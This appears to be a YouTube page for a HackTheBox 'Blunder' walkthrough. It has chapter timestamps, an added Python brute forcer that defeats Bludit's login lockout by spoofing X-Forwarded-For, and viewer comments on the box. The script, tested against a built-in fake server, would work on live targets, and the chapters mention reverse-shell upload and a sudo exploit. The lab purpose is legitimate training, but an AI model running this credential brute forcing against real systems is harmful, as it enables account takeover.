HackTheBox - Blunder

30,543 views

IppSec

1 day ago

00:00 - Intro
01:03 - Start of nmap
04:30 - Discovering install.php, which says Bludit is being installed
06:30 - Looking for exploits with searchsploit; everything requires auth
07:35 - Attempting a login and noticing the CSRF tokens
09:20 - Looking for exploits online that haven't made it to searchsploit yet
12:00 - Placing the X-Forwarded-For header to bypass brute-force protection
15:40 - Creating a Python brute forcer
16:45 - Scripting: Grabbing the CSRF value with Python requests
18:20 - Scripting: Grabbing the PHP session cookie with Python requests
18:20 - Scripting: Sending a login request with Python requests
18:20 - Scripting: Telling requests not to follow redirects and detecting a valid login
31:10 - Using CeWL to build a wordlist, then changing our Python script to pull passwords from the wordlist
34:30 - Scripting: Setting a random IP in the X-Forwarded-For header
37:50 - Scripting: Fixing a bug, then getting a password via brute force!
41:00 - Start of playing around with the Bludit image upload vulnerability
45:10 - Having trouble; running the exploit with Metasploit through a proxy to understand what is going on
47:50 - Uploading a PHP reverse shell, then an .htaccess file to get code execution
01:02:30 - Reverse shell returned; finding passwords in the Bludit database, then cracking them
01:08:20 - Cracked a password for hugo, switching to his user
01:09:30 - Doing the sudo underflow exploit
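Added example (not IppSec's script and not Bludit's own code): a stand-alone Python model of the brute-force loop the chapters above build, paired with a constructed in-process stand-in for the Bludit login endpoint so it runs offline. It grabs the tokenCSRF value and the PHPSESSID cookie from the login page, POSTs the credentials under that session without following redirects, treats a redirect to the dashboard as the success signal, and puts a random X-Forwarded-For on every attempt so a per-IP lockout keyed on that header never triggers. The form field names, the response texts, the 10-failure lockout threshold, the 10.10.14.5 attacker address and the send(method, path, headers, form) transport interface are all assumptions; against a live target you would implement that transport with requests or urllib.

```python
import random
import re
import secrets
from dataclasses import dataclass, field
from typing import Callable, Dict, List, Optional


@dataclass
class Response:
    status: int
    body: str
    headers: Dict[str, str] = field(default_factory=dict)


# Assumed transport interface: (method, path, headers, form) -> Response.
# The brute forcer only talks to this callable, so a live run wraps requests/urllib here.
Transport = Callable[[str, str, Dict[str, str], Optional[Dict[str, str]]], Response]

TOKEN_RE = re.compile(r'name="tokenCSRF"\s+value="([0-9a-f]+)"')
COOKIE_RE = re.compile(r"PHPSESSID=([^;]+)")


def random_ipv4() -> str:
    """A fresh spoofed client address per attempt; the lockout counter is keyed on it."""
    return ".".join(str(random.randint(1, 254)) for _ in range(4))


def try_login(send: Transport, username: str, password: str, spoof_ip: bool = True) -> Optional[bool]:
    """One attempt: True = logged in, False = wrong password, None = blocked or token error."""
    headers = {"X-Forwarded-For": random_ipv4()} if spoof_ip else {}
    # 1. GET the login page: the server issues PHPSESSID and the matching tokenCSRF here.
    page = send("GET", "/admin/login", headers, None)
    token = TOKEN_RE.search(page.body)
    sid = COOKIE_RE.search(page.headers.get("Set-Cookie", ""))
    if not token or not sid:
        return None  # no form came back, e.g. the block notice
    # 2. POST the credentials under the same session cookie, with its token.
    headers = dict(headers, Cookie=f"PHPSESSID={sid.group(1)}")
    form = {"tokenCSRF": token.group(1), "username": username, "password": password, "save": ""}
    resp = send("POST", "/admin/login", headers, form)
    # 3. No redirect following: a 3xx to the dashboard is success, a 200 means the
    #    login page was re-rendered (bad password, block notice or token error).
    if resp.status in (301, 302) and "/admin/dashboard" in resp.headers.get("Location", ""):
        return True
    if "blocked" in resp.body.lower() or "token" in resp.body.lower():
        return None
    return False


def brute_force(send: Transport, username: str, wordlist: List[str], spoof_ip: bool = True) -> Optional[str]:
    """First password that logs in, or None if the list runs out or we get locked out."""
    for password in wordlist:
        result = try_login(send, username, password, spoof_ip)
        if result is True:
            return password
        if result is None:
            return None  # locked out; a real run would back off or re-queue the word
    return None


class FakeBludit:
    """Constructed stand-in for the target. It has the flaw the header trick relies on:
    the failed-login counter is keyed on the client IP, and X-Forwarded-For is trusted
    over the socket address."""
    MAX_FAILURES = 10  # assumed threshold

    def __init__(self, username: str, password: str):
        self.creds = (username, password)
        self.sessions: Dict[str, str] = {}  # PHPSESSID -> tokenCSRF
        self.failures: Dict[str, int] = {}  # client ip -> failed logins

    def __call__(self, method, path, headers, form) -> Response:
        if path != "/admin/login":
            return Response(404, "not found")
        ip = headers.get("X-Forwarded-For", "10.10.14.5")  # constructed attacker address
        if self.failures.get(ip, 0) >= self.MAX_FAILURES:
            return Response(200, "IP address has been blocked")
        if method == "GET":
            sid, token = secrets.token_hex(16), secrets.token_hex(16)
            self.sessions[sid] = token
            body = f'<input type="hidden" name="tokenCSRF" value="{token}">'
            return Response(200, body, {"Set-Cookie": f"PHPSESSID={sid}; path=/"})
        m = COOKIE_RE.search(headers.get("Cookie", ""))
        if not m or self.sessions.get(m.group(1)) != (form or {}).get("tokenCSRF"):
            return Response(200, "Invalid CSRF token")
        if (form["username"], form["password"]) == self.creds:
            return Response(302, "", {"Location": "/admin/dashboard"})
        self.failures[ip] = self.failures.get(ip, 0) + 1
        return Response(200, "Username or password incorrect")


def demo():
    """Constructed wordlist with the right word past the lockout threshold:
    without the spoofed header the box locks us out before we reach it."""
    secret = "c0nstructed-Pa55"
    words = [f"wrong{i}" for i in range(25)] + [secret]
    locked_out = brute_force(FakeBludit("admin", secret), "admin", words, spoof_ip=False)
    found = brute_force(FakeBludit("admin", secret), "admin", words, spoof_ip=True)
    return locked_out, found


if __name__ == "__main__":
    print(demo())
```

Running demo() shows both sides of the bypass: with spoof_ip=False the eleventh GET comes back as the block notice with no token and the run stops with None, while the spoofed run walks the whole list and recovers the password. The hard stop on None is deliberately blunt; a script meant for a real engagement should re-queue a word whose attempt failed on the token rather than on the credentials, since that word was never actually tested.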

Comments: 90
@azelbane87 3 years ago
Just SPECTACULAR as usual! When U do boxes like that (with no prep or whatever) I just admit I learn much, MUCH, MUCH more, 'cause you go through the whole troubleshooting process to get things done, and that allows me to understand things that otherwise would not seem that obvious. Your workflow is amazing IPPSEC, although I guess it 'irritates' you when videos get longer than what you expect.... but honestly, following you through all the steps in troubleshooting things, THAT is SOMETHING ELSE! You have no clue how much MORE I learn!! AWESOME STUFF, JUST AWESOME!! Thanks as usual for the time and effort you put into it! BLESS U
@ca7986 3 years ago
You have a lot of patience! 😁 Amazing video as always!❤️
@nios1515 3 years ago
Taking my OSCP tomorrow, wish me luck! Thanks for the video
@DHIRAL2908 3 years ago
Good luck!!!
@maluniversity 3 years ago
you should get wasted first, then take it. it numbs the pain from the boxes that you'll have absolutely no idea about.
@tamilxctf4075 3 years ago
Fail fail fail = p455!
@segev1824 3 years ago
How did it go?
@UnknownSend3r 3 years ago
So how did it go ?
@abdosama 3 years ago
First view, first comment. I always learn from your videos, thank you
@hardikmalani2180 3 years ago
Blunder was my first box :) Solved it yesterday. Copied everything from KZbin, but it's a great deal ;)
@mayankdeshmukh8752 3 years ago
That's how you learn buddy ;)
@hardikmalani2180 3 years ago
@@mayankdeshmukh8752 :)
@crafterzman5277 3 years ago
That's gonna get you banned from the platform
@vonniehudson 3 years ago
@ippsec: thanks for the GitHub issues trick. That was very insightful. You mentioned it at 01:01:53
@kret63 3 years ago
That three tens, Dude! I laughed and screamed!
@Ms.Robot. 3 years ago
Well done! Bravo! 😍💝 applaud, applaud.
@lc5813 3 years ago
Hey ipp, I was wondering how you guys clean up machines you hacked after an assessment. Any methods you want to show on a next HackTheBox machine? Thanks for the great content ;)
@loganmay2105 3 years ago
I think there is a small issue with your code: if you were to get a CSRF error, that password would never be tried against the login, since the error is with the token, not the credentials. The fastest way to fix this would just be to convert your wordlist into a list when it's imported and then:

    if r.status_code != 200:
        print("CSRF Error")
        wordlist.append(password)
        return False

This way you would try it again after going through the rest of the list, and keep retrying any you got an invalid CSRF for. I could have missed something in your code though lol, so sorry if I'm mistaken. Great video as always.
@8668maroto 3 years ago
TY for these videos!!!
@alimujtaba9063 3 years ago
One day I will come to your channel and do all the machines ❤️ Thank you, love from Pakistan. Now working on basics.
@marcusflodkvist7423 3 years ago
NOOOO, I just started with this box. I even found the CSRF bruteforce method..... Oh well, I'll just have to watch this....
@tamilxctf4075 3 years ago
Noice bruh!!!😏🏅🎃
@crundle2855 3 years ago
Oddly enough this box doesn't need that clever bruteforce at all - the foothold password was right there on the page; I guessed it on the first try. It really stands out because it's missing some whitespace :)
@bugr33d0_hunter8 3 years ago
Way to be, Mr. Crundle, nice 👌 cavêąt👍
@rujotheone 3 years ago
Didn't notice that. Someone recommended I use Cewl to build a password list. Was about to try that.
@hippityhoppitygetoffmyprop1000 3 years ago
Someone just told me it’s camel cased. This method however is so much more unique and interesting.
@MrMeLaX 3 years ago
Thank you.
@bugr33d0_hunter8 3 years ago
🛀 :~/$ wc
@h4cker_io 3 years ago
thank you
@m_peter1514 3 years ago
thank you so much
@bugr33d0_hunter8 3 years ago
😇
@buhaytza2005 3 years ago
Wouldn't it be easier to get the CSRF token and, instead of extracting the cookies, just set up r = requests.Session() so that it retains all the cookies?
@ertertz9408 3 years ago
I was so unbelievably stuck on root, I took TWO MONTHS (I mean, I did take two long breaks because I got demotivated as fuck). I don't know how I managed to take this long; I even KNEW ABOUT THE SUDO BUG AND THE AFFECTED VERSIONS.
@shayboual1892 3 years ago
If you look through Shaun's files, you can find a hidden file called 'sudo as admin successful' and a screenshot of him escalating himself to root through Hugo's account
@WashingtonFernandes 2 years ago
1:09:08 Some Debian/Ubuntu-based distros have some aliases for ls commands; la is an alias for ls -la, and there are other ones like ll, l, lh and some more
@giuliom126 3 years ago
Uff! Finished just 3 days ago
@c1ph3rpunk 3 years ago
‘la’ is probably an alias on the box. I think most RHEL/CentOS machines come with some aliases like ll and la.
@redpanda31337 3 years ago
Should check out the aliases on parrotOS, there are some nice hidden gems in there ;)
@neunzehnvierundachtzig 2 years ago
@@redpanda31337 the 'sudo' have some very good aliases
@lercenico8260 3 years ago
1:09:12 -> la is an alias for 'ls -A'
@arachn1d13 3 years ago
which in turn is the output of "type la" :)
@muratkacmaz789 3 years ago
wow 😱😵
@bugr33d0_hunter8 3 years ago
🤡🤯
@DHIRAL2908 3 years ago
😛
@chandrakanth4241 3 years ago
I saw the first video on YouTube with zero dislikes, NICE. I thought there were bots which would just randomly dislike videos.
@mayankdeshmukh8752 3 years ago
Hey ipp, why don't you try the "hashid" tool? It gives the JtR format and hashcat mode based on the hash ;)
@itzkoushik3233 3 years ago
Legends don't buy, they hack them up.
@shayboual1892 3 years ago
Me (who spent hours on this machine and only managed to get a www-data shell) when you searched blundit: What a fool
@shayboual1892 3 years ago
I just finished the video and realised the only thing I needed to do was put best64 rules in hashcat. That's so annoying. I even knew about the sudo part, since there are hints in the box you can find with good enumeration. This was my first box as well and I was so close to doing it
@redpanda31337 3 years ago
@@shayboual1892 I just searched the hash in Google; the first result was the password.
@shayboual1892 3 years ago
@@redpanda31337 huh, never thought of doing that
@luisito7018 3 years ago
hahaha it happens
@TheQuest07 3 years ago
I cannot upgrade my shell. How can I upgrade this? I used Metasploit for the file upload vuln.

    python3 -c 'import pty; pty.spawn("/bin/bash")'
    ctrl + z
    background channel 0? [y/N] y
    meterpreter> stty raw -echo
    Unknown command: stty

So I background again and now in msf6 exploit(linux…..blahblahblah)> I try stty raw -echo here and the lines go funny. Instead of a new line under, it is beside the old line. I try stty rows 16 columns 136 but nothing changes. fg also does not work… I cannot get stty raw -echo to work, and therefore export TERM=xterm does not work either. I get that it will work if I do the exploit manually, but I would like to know how to do this for future problems. Thank you for your help everyone, and thank you for the videos @IppSec
@raycharles6240 3 years ago
For some reason this box is giving me different results. First Metasploit and meterpreter worked, then all of a sudden it didn't anymore. Weird.
@Alkiiis 3 years ago
I didn't even need to bruteforce; I found the username in /todo.txt and the password was hidden in the first article. :)
@Alkiiis 3 years ago
@Pedro Abreu Yes, this would have been my go-to plan, but the password was hidden way too obviously, so no need for bruteforce.
@bernasevinc5259 3 years ago
Where can I download this Parrot? I couldn't find it on the internet
@mehmetux4186 3 years ago
I never understood the X-Forwarded-For header, or when this header gets written on the internet. I read some documents that say the proxy server writes it to follow the IP address, but I think it should be different. Can anyone say how it works? Which application or layer writes the IP address into this hidden header?
@DHIRAL2908 3 years ago
It basically tells the server that this request was forwarded (or made) by this particular IP. Without this header, the server can just see the sender's IP on the request, like the address on a letter. But specifying this leads some servers to believe it!
@mehmetux4186 3 years ago
@@DHIRAL2908 thanks friend. I am trying to understand when the IP address gets written there and which application does this job. When the request goes out of the browser or my machine this header doesn't show. And we also saw in this video, in Burp, that this header can't be seen, but he wrote it manually
@DHIRAL2908 3 years ago
@@mehmetux4186 yeah, that is because we can manually write the header in the request to confuse the server into thinking this was sent by someone else. Basically not the same IP as before, leading to bypassing the IP ban!
@mehmetux4186 3 years ago
@@DHIRAL2908 but when we don't write it manually, our IP address is also written by something, because the server knows our original IP address even when we don't write it manually. I want to learn when and which app writes it automatically.
@DHIRAL2908 3 years ago
@@mehmetux4186 it's pretty rare to see a browser writing it automatically. It maybe happens if you have a proxy and the server wants your machine's own IP, maybe to send something....
@rujotheone 3 years ago
Nooo. I just started this box. Couldn't get the password. My list was not sufficient
@rujotheone 3 years ago
@@johncollins9466 Got the password, but I got stuck at bruteforcing. Seems the CSRF token was the issue. Now watching this video
@antoniob.6515 5 months ago
Supreme, but I can teach you how to use Vim 😊
@thepioneer517 3 years ago
Why don't you use CherryTree anymore? You made more notes in the last few videos...
@bugr33d0_hunter8 3 years ago
🍒 cherrytree got spanked. Its not the runner up anymore.
@cimihan4816 3 years ago
@@bugr33d0_hunter8 what do you recommend that is better than that, or equivalent to it?
@karimmohamed3744 3 years ago
@@cimihan4816 joplin
@fatherdani 3 years ago
'la' is an alias of 'ls -A' in .bashrc
@0xmmn 9 months ago
how is this box rated as easy?
@miguelmota9714 3 years ago
Why would you use cewl instead of already-known password lists like rockyou?
@Xx-nd1rs 1 year ago
I think it will take long
@csmole1231 3 years ago
I just had a really weird dream! A woman doesn't like me; she steps back and grabs a screen out of her purse. That screen has a red warning background with some lines of code on it. She flashes the screen in front of my eyes, and all of a sudden my eyes hurt, then go blind, and I fall onto the ground and start shaking. Then I wake up 😂 The first thought I have is being very pissed at myself: "why the heck would you execute that!" 😂 lol
@csmole1231 3 years ago
I can't quite remember why that woman doesn't like me :/ We were relaxing at some beautiful park, then I asked something resembling "so what hashes do you like" 😂😂😂😂
@nonasuomynona1734 3 years ago
@@csmole1231 interesting
@dwpersGC 3 years ago
Love your videos, but man this one was agonizing to get through. You were flying way too fast and making so many mistakes with typing. Missing the alias for 'la' and so on. It's the first time I wanted to stop watching one of your videos. With all that said, still big ups to you for working through this and posting it. Just remember that slow is smooth and smooth is fast.
@LarryTheRoleplayerTM 3 years ago
Fucking painful to watch man... Seriously, slow down and make sure you're typing the right words.